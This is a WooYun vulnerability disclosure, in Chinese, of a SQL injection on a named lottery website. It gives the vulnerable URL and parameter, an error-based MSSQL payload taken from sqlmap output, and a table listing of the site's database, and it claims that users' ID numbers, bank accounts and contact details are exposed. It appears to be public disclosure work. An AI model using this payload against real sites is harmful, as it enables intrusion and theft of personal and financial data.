漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0169767
漏洞标题:555CAIPIAO主站注入(涉及所有用户的姓名,身份证,邮箱,电话,银行账号,地址)
相关厂商:长沙市起航网络科技有限公司
漏洞作者: 头晕脑壳疼
提交时间:2016-01-14 09:22
修复时间:2016-02-27 11:49
公开时间:2016-02-27 11:49
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
严重缺wb
详细说明:
注入点
http://555caipiao.com/ctzq/?betTypeId=38&issueNum=2016009
GET parameter 'issueNum' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 286 HTTP(s) requests:
---
Parameter: issueNum (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: betTypeId=38&issueNum=2016009 AND 3554=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3554=3554) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)))
---
[01:26:53] [INFO] testing Microsoft SQL Server
[01:26:53] [INFO] confirming Microsoft SQL Server
[01:26:56] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[01:26:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 58 times
数据库信息
Database: caipiao
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| dbo.T_b_Team | 46448446 |
| dbo.T_b_LetGoalDetail | 4440623 |
| dbo.T_b_TotalScoreDetail | 3279781 |
| dbo.matchDetail | 2858454 |
| dbo.T_TotalScore | 2536771 |
| dbo.T_b_Schedule_Result | 1430658 |
| dbo.T_LetgoalHalf | 1359627 |
| dbo.T_TotalScoreHalf | 1303182 |
| dbo.T_Date | 1209373 |
| dbo.T_Standard | 1205299 |
| dbo.T_Letgoal | 935928 |
| dbo.T_Schedule | 822870 |
| dbo.T_b_StandardDetail | 730401 |
| dbo.t_raceResult | 704374 |
| dbo.T_TotalScoreHalfDetail | 630091 |
| dbo.T_BeginTime | 359821 |
| dbo.T_b_TotalScore | 263245 |
| dbo.T_b_Standard | 184962 |
| dbo.TicketsJczq | 142498 |
| dbo.UserProfitRatio | 135640 |
| dbo.UserProfitRatioView | 135640 |
| dbo.AutoOut | 124830 |
| dbo.Score | 118741 |
| dbo.T_HalfFull | 101914 |
| dbo.T_BigSmallScore | 101911 |
| dbo.T_SingleDoubleScore | 101910 |
| dbo.T_AllGoals | 101902 |
| dbo.T_b_Score | 89188 |
| dbo.CooperateBuyInfos | 88648 |
| dbo.CooperateBuyInfosCountView | 87537 |
| dbo.TransDetails | 80877 |
| dbo.TransDetailsView | 80877 |
| dbo.T_b_Schedule | 80683 |
| dbo.League | 80625 |
| dbo._temp | 80001 |
| dbo.CooperateBuyInfosView | 79527 |
| dbo.TicketsBjdc | 66689 |
| dbo.CarBase | 66621 |
| dbo.BackProfitRatio | 56990 |
| dbo.DetailsDotteryPlansProfitView | 54868 |
| dbo.MobileLoginUser | 47360 |
| dbo.T_Team | 35838 |
| dbo.CurrentOddsLast | 27224 |
| dbo.T_LetGoalDetail | 26251 |
| dbo.T_Schedule_Result | 23273 |
| dbo.lotteryPlansIssue | 22042 |
| dbo.T_b_letgoal | 21322 |
| dbo.TicketsNumber | 20554 |
| dbo.LotteryPlansMore | 19447 |
| dbo.Team | 17133 |
| dbo.DetailsDotteryPlansView | 14955 |
| dbo.LotteryPlans | 14947 |
| dbo.LotteryPlansChippedView | 14947 |
| dbo.LotteryPlansView | 14947 |
| dbo.CurrentOdds | 14468 |
| dbo.MobileVisitSum | 11884 |
| dbo.T_StandardDetail | 11700 |
| dbo.LotteryInfos | 10762 |
| dbo.LotteryInfosView | 10675 |
| dbo.NumberBase | 9620 |
| dbo.NumberBaseView | 9620 |
| dbo.User_ProfitRatio | 6754 |
| dbo.TicketsVictoryOrDefeat | 6306 |
| dbo.T_LetGoalHalfDetail | 5931 |
| dbo.Members_Profit | 5832 |
| dbo.NewsUrlInfo | 5451 |
| dbo.T_FMatchSeason | 4472 |
| dbo.TicketsJclq | 3838 |
| dbo.BonusResult | 3743 |
| dbo.CurrentOddsOpen | 2910 |
| dbo.userInfoView | 2848 |
| dbo.AccountInfos | 2825 |
| dbo.Users | 2777 |
| dbo.CarError | 2403 |
| dbo.TicketsCar | 2042 |
| dbo.MobileOtherInfoSum | 2034 |
| dbo.bjdcSchedul | 1562 |
| dbo.Drawings | 1479 |
| dbo.T_TotalScoreDetail | 1468 |
| dbo.DrawingsView | 1402 |
| dbo.T_leagueCup | 1327 |
| dbo.T_LotteryRelation | 1180 |
| dbo.T_Sclass | 1063 |
| dbo.T_FSclass | 1059 |
| dbo.bjdcschedule | 819 |
| dbo.UserLoginInformation | 810 |
| dbo.ScheduleAddInfos | 806 |
| dbo.bjdcScheduleView | 724 |
| dbo.UcPwd | 630 |
| dbo.MobilePayOrder | 617 |
| dbo.Citys | 525 |
| dbo.CurrentOddsLastView | 409 |
| dbo.Demo2 | 400 |
| dbo.T_b_League | 313 |
| dbo.T_b_Sclass | 226 |
| dbo.FilterResult | 218 |
| dbo.jczqscheduleView | 215 |
| dbo.OddsInfos | 189 |
| dbo.siteUsers | 165 |
| dbo.SelectedScheduleCompany | 149 |
| dbo.MobileOrderInfo | 136 |
| dbo.TicketsXysc | 134 |
| dbo.T_FCountry | 105 |
| dbo.ExtendUsers | 101 |
| dbo.Tickets | 100 |
| dbo.LotteryInfoTypes | 87 |
| dbo.jczqschedule | 76 |
| dbo.extendTotalMoneyView | 74 |
| dbo.siteAdministrator | 68 |
| dbo.OlympicStake | 63 |
| dbo.OlympicEventItems | 56 |
| dbo.OddsInfos_Hc | 54 |
| dbo.BetTypes | 50 |
| dbo.BetTypesView | 49 |
| dbo.ATotalMoneyView | 41 |
| dbo.Provinces | 35 |
| dbo.Company | 22 |
| dbo.Demo1 | 20 |
| dbo.TransTypes | 20 |
| dbo.DataUrl | 16 |
| dbo.Lotterys | 16 |
| dbo.newsType | 16 |
| dbo.BTotalMoneyView | 12 |
| dbo.NumberBaseNewView | 11 |
| dbo.CTotalMoneyView | 9 |
| dbo.NewsArea | 9 |
| dbo.DTotalMoneyView | 8 |
| dbo.OlympicEvent | 7 |
| dbo.Admins | 5 |
| dbo.T_FArea | 5 |
| dbo.rebate | 4 |
| dbo.ETotalMoneyView | 3 |
| dbo.cashBack | 2 |
| dbo.LotteryResults | 2 |
| dbo.SsqPrizeInfo | 2 |
| dbo.siteType | 1 |
| dbo.ws_users | 1 |
+-----------------------------------+---------+
管理账户信息
泄露账户的姓名,身份证,邮箱,电话,银行账号,地址
漏洞证明:
注入点
http://555caipiao.com/ctzq/?betTypeId=38&issueNum=2016009
GET parameter 'issueNum' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 286 HTTP(s) requests:
---
Parameter: issueNum (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: betTypeId=38&issueNum=2016009 AND 3554=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3554=3554) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)))
---
[01:26:53] [INFO] testing Microsoft SQL Server
[01:26:53] [INFO] confirming Microsoft SQL Server
[01:26:56] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[01:26:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 58 times
数据库信息
Database: caipiao
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| dbo.T_b_Team | 46448446 |
| dbo.T_b_LetGoalDetail | 4440623 |
| dbo.T_b_TotalScoreDetail | 3279781 |
| dbo.matchDetail | 2858454 |
| dbo.T_TotalScore | 2536771 |
| dbo.T_b_Schedule_Result | 1430658 |
| dbo.T_LetgoalHalf | 1359627 |
| dbo.T_TotalScoreHalf | 1303182 |
| dbo.T_Date | 1209373 |
| dbo.T_Standard | 1205299 |
| dbo.T_Letgoal | 935928 |
| dbo.T_Schedule | 822870 |
| dbo.T_b_StandardDetail | 730401 |
| dbo.t_raceResult | 704374 |
| dbo.T_TotalScoreHalfDetail | 630091 |
| dbo.T_BeginTime | 359821 |
| dbo.T_b_TotalScore | 263245 |
| dbo.T_b_Standard | 184962 |
| dbo.TicketsJczq | 142498 |
| dbo.UserProfitRatio | 135640 |
| dbo.UserProfitRatioView | 135640 |
| dbo.AutoOut | 124830 |
| dbo.Score | 118741 |
| dbo.T_HalfFull | 101914 |
| dbo.T_BigSmallScore | 101911 |
| dbo.T_SingleDoubleScore | 101910 |
| dbo.T_AllGoals | 101902 |
| dbo.T_b_Score | 89188 |
| dbo.CooperateBuyInfos | 88648 |
| dbo.CooperateBuyInfosCountView | 87537 |
| dbo.TransDetails | 80877 |
| dbo.TransDetailsView | 80877 |
| dbo.T_b_Schedule | 80683 |
| dbo.League | 80625 |
| dbo._temp | 80001 |
| dbo.CooperateBuyInfosView | 79527 |
| dbo.TicketsBjdc | 66689 |
| dbo.CarBase | 66621 |
| dbo.BackProfitRatio | 56990 |
| dbo.DetailsDotteryPlansProfitView | 54868 |
| dbo.MobileLoginUser | 47360 |
| dbo.T_Team | 35838 |
| dbo.CurrentOddsLast | 27224 |
| dbo.T_LetGoalDetail | 26251 |
| dbo.T_Schedule_Result | 23273 |
| dbo.lotteryPlansIssue | 22042 |
| dbo.T_b_letgoal | 21322 |
| dbo.TicketsNumber | 20554 |
| dbo.LotteryPlansMore | 19447 |
| dbo.Team | 17133 |
| dbo.DetailsDotteryPlansView | 14955 |
| dbo.LotteryPlans | 14947 |
| dbo.LotteryPlansChippedView | 14947 |
| dbo.LotteryPlansView | 14947 |
| dbo.CurrentOdds | 14468 |
| dbo.MobileVisitSum | 11884 |
| dbo.T_StandardDetail | 11700 |
| dbo.LotteryInfos | 10762 |
| dbo.LotteryInfosView | 10675 |
| dbo.NumberBase | 9620 |
| dbo.NumberBaseView | 9620 |
| dbo.User_ProfitRatio | 6754 |
| dbo.TicketsVictoryOrDefeat | 6306 |
| dbo.T_LetGoalHalfDetail | 5931 |
| dbo.Members_Profit | 5832 |
| dbo.NewsUrlInfo | 5451 |
| dbo.T_FMatchSeason | 4472 |
| dbo.TicketsJclq | 3838 |
| dbo.BonusResult | 3743 |
| dbo.CurrentOddsOpen | 2910 |
| dbo.userInfoView | 2848 |
| dbo.AccountInfos | 2825 |
| dbo.Users | 2777 |
| dbo.CarError | 2403 |
| dbo.TicketsCar | 2042 |
| dbo.MobileOtherInfoSum | 2034 |
| dbo.bjdcSchedul | 1562 |
| dbo.Drawings | 1479 |
| dbo.T_TotalScoreDetail | 1468 |
| dbo.DrawingsView | 1402 |
| dbo.T_leagueCup | 1327 |
| dbo.T_LotteryRelation | 1180 |
| dbo.T_Sclass | 1063 |
| dbo.T_FSclass | 1059 |
| dbo.bjdcschedule | 819 |
| dbo.UserLoginInformation | 810 |
| dbo.ScheduleAddInfos | 806 |
| dbo.bjdcScheduleView | 724 |
| dbo.UcPwd | 630 |
| dbo.MobilePayOrder | 617 |
| dbo.Citys | 525 |
| dbo.CurrentOddsLastView | 409 |
| dbo.Demo2 | 400 |
| dbo.T_b_League | 313 |
| dbo.T_b_Sclass | 226 |
| dbo.FilterResult | 218 |
| dbo.jczqscheduleView | 215 |
| dbo.OddsInfos | 189 |
| dbo.siteUsers | 165 |
| dbo.SelectedScheduleCompany | 149 |
| dbo.MobileOrderInfo | 136 |
| dbo.TicketsXysc | 134 |
| dbo.T_FCountry | 105 |
| dbo.ExtendUsers | 101 |
| dbo.Tickets | 100 |
| dbo.LotteryInfoTypes | 87 |
| dbo.jczqschedule | 76 |
| dbo.extendTotalMoneyView | 74 |
| dbo.siteAdministrator | 68 |
| dbo.OlympicStake | 63 |
| dbo.OlympicEventItems | 56 |
| dbo.OddsInfos_Hc | 54 |
| dbo.BetTypes | 50 |
| dbo.BetTypesView | 49 |
| dbo.ATotalMoneyView | 41 |
| dbo.Provinces | 35 |
| dbo.Company | 22 |
| dbo.Demo1 | 20 |
| dbo.TransTypes | 20 |
| dbo.DataUrl | 16 |
| dbo.Lotterys | 16 |
| dbo.newsType | 16 |
| dbo.BTotalMoneyView | 12 |
| dbo.NumberBaseNewView | 11 |
| dbo.CTotalMoneyView | 9 |
| dbo.NewsArea | 9 |
| dbo.DTotalMoneyView | 8 |
| dbo.OlympicEvent | 7 |
| dbo.Admins | 5 |
| dbo.T_FArea | 5 |
| dbo.rebate | 4 |
| dbo.ETotalMoneyView | 3 |
| dbo.cashBack | 2 |
| dbo.LotteryResults | 2 |
| dbo.SsqPrizeInfo | 2 |
| dbo.siteType | 1 |
| dbo.ws_users | 1 |
+-----------------------------------+---------+
管理账户信息
泄露账户的姓名,身份证,邮箱,电话,银行账号,地址
修复方案:
若怕信息外泄,让审核打码吧!
版权声明:转载请注明来源 头晕脑壳疼@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)